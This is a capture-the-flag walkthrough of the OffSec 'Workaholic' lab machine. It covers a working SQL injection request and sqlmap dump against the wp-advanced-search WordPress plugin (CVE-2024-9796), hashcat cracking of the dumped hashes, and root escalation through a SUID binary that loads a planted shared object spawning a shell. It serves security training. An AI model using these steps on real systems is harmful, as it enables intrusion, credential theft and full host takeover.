Summary #
To get initial access to the target we can use the OFFSEC provided credentials with SSH or scan the Wordpress site on port 80 for vulnerable plugins using wpprobe. There is one plugin named wp-advanced-search which has a unauthenticated SQL injection vulnerability (CVE-2024-9796). Exploiting this vulnerability with sqlmap gives us a number of users and hashes. Cracking with hashcat gives credentials for the charlie and ted users. With the ted user we can log into the FTP service and get another password that’s the same as provided by OFFSEC. So. we login to the target as charlie over SSH. Abusing a SUID binary /var/www/html/wordpress/blog/wp-monitor with our own shared object as the ted user allows us to escalate our privileges to root.
Specifications #
- Name: WORKAHOLIC
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- OS: Linux workaholic 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.134.229
- OFFSEC provided credentials:
charlie:rU)tJnTw5*ShDt4nOx - HASH:
local.txt:1b340789a85268c76fe00d5c5f845411 - HASH:
proof.txt:db0c9b31c34c3aef9e449c30ca3e2028
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir workaholic && cd workaholic && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 16 18:53 .
drwxrwxr-x 29 kali kali 4096 Aug 16 18:53 ..
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 enum
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 exploits
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 files
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 tools
drwxrwxr-x 2 kali kali 4096 Aug 16 18:53 uploads
## set bash variable
ip=192.168.134.229
## ping target to check if it's online
ping $ip
PING 192.168.134.229 (192.168.134.229) 56(84) bytes of data.
64 bytes from 192.168.134.229: icmp_seq=1 ttl=61 time=16.8 ms
64 bytes from 192.168.134.229: icmp_seq=2 ttl=61 time=17.1 ms
^C
--- 192.168.134.229 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 16.825/16.947/17.069/0.122 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.134.229:21
Open 192.168.134.229:22
Open 192.168.134.229:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 18:57 CEST
Initiating Ping Scan at 18:57
Scanning 192.168.134.229 [4 ports]
Completed Ping Scan at 18:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:57
Completed Parallel DNS resolution of 1 host. at 18:57, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:57
Scanning 192.168.134.229 [3 ports]
Discovered open port 21/tcp on 192.168.134.229
Discovered open port 80/tcp on 192.168.134.229
Discovered open port 22/tcp on 192.168.134.229
Completed SYN Stealth Scan at 18:57, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.134.229
Host is up, received echo-reply ttl 61 (0.018s latency).
Scanned at 2025-08-16 18:57:30 CEST for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 61
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
21/tcp open ftp syn-ack ttl 61
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
21,22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 21,22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
| 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp open http syn-ack ttl 61 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Workaholic
|_http-generator: WordPress 6.7.2
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 6BD852FF8C391FD56DF5A8EF4C2DB7FC
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
| 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp open http syn-ack ttl 61 nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Workaholic
|_http-generator: WordPress 6.7.2
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 6BD852FF8C391FD56DF5A8EF4C2DB7FC
Initial Access: path 1 #
Because OFFSEC provided the credentials charlie:rU)tJnTw5*ShDt4nOx we can SSH to the target to get initial access as the charlie user in the /home/charlie directory, find local.txt and print it.
ssh charlie@$ip
charlie@192.168.134.229's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Aug 16 07:21:21 PM UTC 2025
System load: 0.0 Processes: 159
Usage of /: 63.1% of 9.75GB Users logged in: 0
Memory usage: 35% IPv4 address for ens192: 192.168.134.229
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
204 updates can be applied immediately.
144 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Aug 16 19:11:07 2025 from 192.168.45.204
$
## print the current working directory
$ pwd
/home/charlie
## print `local.txt`
$ cat local.txt
1b340789a85268c76fe00d5c5f845411
Initial Access: path 2 #
On port 80 there is a Wordpress site running, so let’s check it out in the browser. When you scroll over the Workaholic title you see the hostname workaholic.offsec. So let’s add this to the /etc/hosts file.
## use nano to edit the `/etc/hosts` file
sudo nano /etc/hosts
## add this entry and save the file
192.168.134.229 workaholic.offsec
Now, run wpprobe (https://github.com/Chocapikk/wpprobe) and see what’s running and installed on the Wordpress site.
## run wpprobe using docker
docker run -it --rm wpprobe scan --url http://$ip
__ __ ___ ___ _
/ / /\ \ \/ _ \/ _ \_ __ ___ | |__ ___
\ \/ \/ / /_)/ /_)/ '__/ _ \| '_ \ / _ \
\ /\ / ___/ ___/| | | (_) | |_) | __/
\/ \/\/ \/ |_| \___/|_.__/ \___|
v0.8.0 [latest]
Stealthy WordPress Plugin Scanner - By @Chocapikk
18:15:03 [INFO] No proxy URL provided, checking environment variables
18:15:03 [INFO] No proxy configured; using direct connection
╭──────────────────────────────────────────────────────────────────────────╮
│ 🔎 http://192.168.134.229 (Critical: 0 | High: 0 | Medium: 0 | Low: 0) │
│ └── wp-advanced-search (unknown) [50.00% confidence] │
╰──────────────────────────────────────────────────────────────────────────╯
The wp-advanced-search plugin is installed on the target. Searching internet we could find an unauthenticated SQL injection exploit (CVE-2024-9796) with this PoC: https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/. Running this on our target shows three users are defined. Now run sqlmap to dump the wp_users table out of Wordpress. Save the hashes in a file called hash and try to crack them using hashcat.
## run a test with the exploit
curl "http://$ip/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
admin
charlie
ted
## dump wp_users using `sqlmap`
sqlmap -u "http://$ip/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e" --is-dba -T wp_users --dump
<SNIP>
[3 entries]
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://workaholic.offsec | $P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn. | admin@offsec.com | admin | 0 | admin | admin | 2025-03-27 11:15:16 | <blank> |
| 2 | <blank> | $P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p. | charlie@offsec.com | charlie | 0 | charlie | charlie | 2025-03-27 11:15:17 | <blank> |
| 3 | <blank> | $P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/ | ted@offsec.com | ted | 0 | ted | ted | 2025-03-27 11:15:17 | <blank> |
+----+--------------------------+------------------------------------+--------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
<SNIP>
## change directory
nano hash
## add the following hashes to a file called `hash`
$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/
## use hashcat to try to crack the hashes using the `rockyou.txt`
hashcat -m 400 hash /opt/rockyou.txt
<SNIP>
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.:chrish20
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/:okadamat17
<SNIP>
Hashcat cracked 2 out of 3 hashes, charlie:chrish20 and ted:okadamat17. Using these credentials to access the URL: http://workaholic.offsec/wp-admin shows that they are regular users. So, no easy initial access. So let’s try these credentials on FTP. The ted user can access the FTP service and download wp-config.php. This gives us a password for the database: wpadmin:rU)tJnTw5*ShDt4nOx.
## connect as `ted` to FTP
ftp ted@$ip
Connected to 192.168.134.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
## set passive mode off
ftp> passive
Passive mode: off; fallback to active mode: off.
## print content directory
ftp> dir
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxr-xr-x 1 1002 1002 405 Mar 27 11:15 index.php
-rwxr-xr-x 1 1002 1002 19915 Mar 27 11:15 license.txt
-rwxr-xr-x 1 1002 1002 7409 Mar 27 11:15 readme.html
-rwxr-xr-x 1 1002 1002 7387 Mar 27 11:15 wp-activate.php
drwxr-xr-x 9 1002 1002 4096 Mar 27 11:15 wp-admin
-rwxr-xr-x 1 1002 1002 351 Mar 27 11:15 wp-blog-header.php
-rwxr-xr-x 1 1002 1002 2323 Mar 27 11:15 wp-comments-post.php
-rwxr-xr-x 1 1002 1002 3336 Mar 27 11:15 wp-config-sample.php
-rwxr-xr-x 1 1002 1002 3178 Mar 27 11:15 wp-config.php
drwxr-xr-x 5 1002 1002 4096 Mar 27 11:15 wp-content
-rwxr-xr-x 1 1002 1002 5617 Mar 27 11:15 wp-cron.php
drwxr-xr-x 30 1002 1002 12288 Mar 27 11:15 wp-includes
-rwxr-xr-x 1 1002 1002 2502 Mar 27 11:15 wp-links-opml.php
-rwxr-xr-x 1 1002 1002 3937 Mar 27 11:15 wp-load.php
-rwxr-xr-x 1 1002 1002 51367 Mar 27 11:15 wp-login.php
-rwxr-xr-x 1 1002 1002 8543 Mar 27 11:15 wp-mail.php
-rwxr-xr-x 1 1002 1002 29032 Mar 27 11:15 wp-settings.php
-rwxr-xr-x 1 1002 1002 34385 Mar 27 11:15 wp-signup.php
-rwxr-xr-x 1 1002 1002 5102 Mar 27 11:15 wp-trackback.php
-rwxr-xr-x 1 1002 1002 3246 Mar 27 11:15 xmlrpc.php
226 Directory send OK.
## download `wp-config.php`
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for wp-config.php (3178 bytes).
100% |******************************************************************************************| 3178 2.98 MiB/s 00:00 ETA
226 Transfer complete.
3178 bytes received in 00:00 (157.96 KiB/s)
## quit FTP service
ftp> quit
221 Goodbye.
## print `wp-config.php`
<SNIP>
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'rU)tJnTw5*ShDt4nOx' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
<SNIP>
This password is the same as the OFFSEC provided credential for the charlie user. Using SSH we indeed can log in the target and get initial access in the /home/charlie directory and are able to print local.txt.
ssh charlie@$ip
charlie@192.168.134.229's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Aug 16 07:11:07 PM UTC 2025
System load: 0.0 Processes: 160
Usage of /: 63.1% of 9.75GB Users logged in: 0
Memory usage: 35% IPv4 address for ens192: 192.168.134.229
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
204 updates can be applied immediately.
144 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$
## print the current working directory
$ pwd
/home/charlie
## print `local.txt`
$ cat local.txt
1b340789a85268c76fe00d5c5f845411
Privilege Escalation #
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.204/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::49e8:fd58:a665:308/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## download `linpeas.sh`
$ wget http://192.168.45.204/linpeas.sh
--2025-08-16 19:24:17-- http://192.168.45.204/linpeas.sh
Connecting to 192.168.45.204:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[============================================================>] 933.76K 5.42MB/s in 0.2s
2025-08-16 19:24:17 (5.42 MB/s) - ‘linpeas.sh’ saved [956174/956174]
## set the execution bit
$ chmod +x linpeas.sh
## run `linpeas.sh`
$ ./linpeas.sh
The linpeas.sh output shows a unknown binary with the SUID bit set: /var/www/html/wordpress/blog/wp-monitor. We can verify this with the find command.
## list all binaries with SUID bit set
$ find / -perm /4000 -ls 2>/dev/null
1121 272 -rwsr-xr-x 1 root root 277936 Apr 8 2024 /usr/bin/sudo
12760 40 -rwsr-xr-x 1 root root 40664 May 30 2024 /usr/bin/newgrp
682 40 -rwsr-xr-x 1 root root 39296 Dec 5 2024 /usr/bin/umount
668 52 -rwsr-xr-x 1 root root 51584 Dec 5 2024 /usr/bin/mount
295 64 -rwsr-xr-x 1 root root 64152 May 30 2024 /usr/bin/passwd
291 72 -rwsr-xr-x 1 root root 72792 May 30 2024 /usr/bin/chfn
30388 56 -rwsr-xr-x 1 root root 55680 Dec 5 2024 /usr/bin/su
294 76 -rwsr-xr-x 1 root root 76248 May 30 2024 /usr/bin/gpasswd
292 44 -rwsr-xr-x 1 root root 44760 May 30 2024 /usr/bin/chsh
674 40 -rwsr-xr-x 1 root root 39296 Apr 8 2024 /usr/bin/fusermount3
18890 336 -rwsr-xr-x 1 root root 342632 Feb 24 21:25 /usr/lib/openssh/ssh-keysign
2856 20 -rwsr-xr-x 1 root root 18736 Dec 2 2024 /usr/lib/polkit-1/polkit-agent-helper-1
2972 160 -rwsr-xr-x 1 root root 163112 Jan 15 2025 /usr/lib/snapd/snap-confine
1402 36 -rwsr-xr-- 1 root messagebus 34960 Aug 9 2024 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
524321 20 -rwsr-xr-x 1 root root 16728 Mar 27 11:15 /var/www/html/wordpress/blog/wp-monitor
When we run this binary it says it’s checking the logs. When we use strace on the binary to see if it’s vulnerable to shared object injection, and it is. The binary searches for /home/ted/.lib/libsecurity.so. We need to switch user to ted (ted:okadamat17) and create it. First, check if we have a compiler on the target. We do, now create a .c file which should drop us a root shell.
## running the binary
$ /var/www/html/wordpress/blog/wp-monitor
[+] Checking the logs...
[!] This can take a while...
## use `strace` on the binary
$ strace /var/www/html/wordpress/blog/wp-monitor 2>&1 | grep -iE "open|access|no such file"
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/var/log/nginx/access.log", O_RDONLY) = -1 EACCES (Permission denied)
write(2, "Error opening log file: Permissi"..., 42Error opening log file: Permission denied
openat(AT_FDCWD, "/home/ted/.lib/libsecurity.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
## check if the gcc compiler is present on the target
$ which gcc
/usr/bin/gcc
## switch user to `ted`
su ted
## create the `.lib` directory
mkdir /home/ted/.lib
## change directory
cd /home/ted/.lib
## create the `libsecurity.c` file
nano libsecurity.c
## file content
// libsecurity.c
#include <stdio.h>
#include <stdlib.h>
void init_plugin() {
system("/bin/bash");
}
## compile the .c file to a shared object
gcc -shared -o /home/ted/.lib/libsecurity.so -fPIC /home/ted/.lib/libsecurity.c
## when we run the `/var/www/html/wordpress/blog/wp-monitor` it should give us a shell as the `root` user
$ /var/www/html/wordpress/blog/wp-monitor
[+] Checking the logs...
root@workaholic:/home/ted/.lib#
## print `proof.txt`
root@workaholic:/home/ted/.lib# cat /root/proof.txt
db0c9b31c34c3aef9e449c30ca3e2028